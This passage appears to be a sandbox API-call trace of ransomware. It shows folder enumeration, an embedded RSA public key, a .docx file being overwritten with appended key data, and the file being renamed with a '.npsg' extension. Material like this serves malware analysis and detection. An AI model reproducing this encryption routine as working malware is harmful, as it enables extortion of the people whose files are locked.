(pszPath="") returned="" [0240.703] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.704] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.704] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0240.704] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.704] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.704] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.705] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\") returned="IMJP9_0\\" [0240.705] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0240.705] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0240.705] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0240.705] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.705] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.705] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.705] PathFindFileNameW (pszPath="") returned="" [0240.705] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.705] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.705] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0240.705] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.706] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.706] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.706] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0240.706] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0240.706] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0240.706] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0240.706] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.706] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.706] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.706] PathFindFileNameW (pszPath="") returned="" [0240.706] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.707] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.707] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0240.707] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0240.708] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0240.708] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.708] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.708] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.708] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0240.708] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0240.708] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0240.708] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0240.708] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.708] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.708] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.708] PathFindFileNameW (pszPath="") returned="" [0240.708] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.710] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.710] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AU", cAlternateFileName="")) returned 1 [0240.710] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0240.710] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 1 [0240.710] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 0 [0240.710] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.710] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.710] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.710] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\") returned="gTnYqN V h\\" [0240.710] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\") returned="ZLJLwY4 p8u\\" [0240.710] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\") returned="Ji_heo\\" [0240.710] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0240.710] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.711] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.711] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.711] PathFindFileNameW (pszPath="") returned="" [0240.711] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24856f50, ftCreationTime.dwHighDateTime=0x1d5b81b, ftLastAccessTime.dwLowDateTime=0xf5765cb0, ftLastAccessTime.dwHighDateTime=0x1d5bb8f, ftLastWriteTime.dwLowDateTime=0xf5765cb0, ftLastWriteTime.dwHighDateTime=0x1d5bb8f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.713] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24856f50, ftCreationTime.dwHighDateTime=0x1d5b81b, ftLastAccessTime.dwLowDateTime=0xf5765cb0, ftLastAccessTime.dwHighDateTime=0x1d5bb8f, ftLastWriteTime.dwLowDateTime=0xf5765cb0, ftLastWriteTime.dwHighDateTime=0x1d5bb8f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.713] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc78d0700, ftCreationTime.dwHighDateTime=0x1d5c386, ftLastAccessTime.dwLowDateTime=0xd9ace850, ftLastAccessTime.dwHighDateTime=0x1d5b9be, ftLastWriteTime.dwLowDateTime=0xd9ace850, ftLastWriteTime.dwHighDateTime=0x1d5b9be, nFileSizeHigh=0x0, nFileSizeLow=0x2c2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8JYqFbEos.docx", cAlternateFileName="8JYQFB~1.DOC")) returned 1 [0240.713] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\8JYqFbEos.docx") returned=".docx" [0240.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\8JYqFbEos.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\8jyqfbeos.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.713] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=11308) returned 1 [0240.713] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.716] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2c06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.716] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.718] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x2c2c, lpOverlapped=0x0) returned 1 [0240.719] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.719] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.719] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.719] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0240.720] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.720] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.720] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.720] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.720] GetLastError () returned 0x0 [0240.720] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.720] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0240.720] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.720] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.721] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.721] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.721] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2c2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.721] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0240.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0240.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0240.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0240.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0240.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0240.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0240.722] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0240.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.722] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.722] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.722] CloseHandle (hObject=0x644) returned 1 [0240.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0240.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b89cd0 [0240.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0240.724] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\8JYqFbEos.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\8jyqfbeos.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\8JYqFbEos.docx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\8jyqfbeos.docx.npsg")) returned 1 [0240.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0240.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.725] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0240.726] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ff38e0, ftCreationTime.dwHighDateTime=0x1d5be62, ftLastAccessTime.dwLowDateTime=0x1f19ff40, ftLastAccessTime.dwHighDateTime=0x1d5b703, ftLastWriteTime.dwLowDateTime=0x1f19ff40, ftLastWriteTime.dwHighDateTime=0x1d5b703, nFileSizeHigh=0x0, nFileSizeLow=0xfdf, dwReserved0=0xa0000003, dwReserved1=0x0, 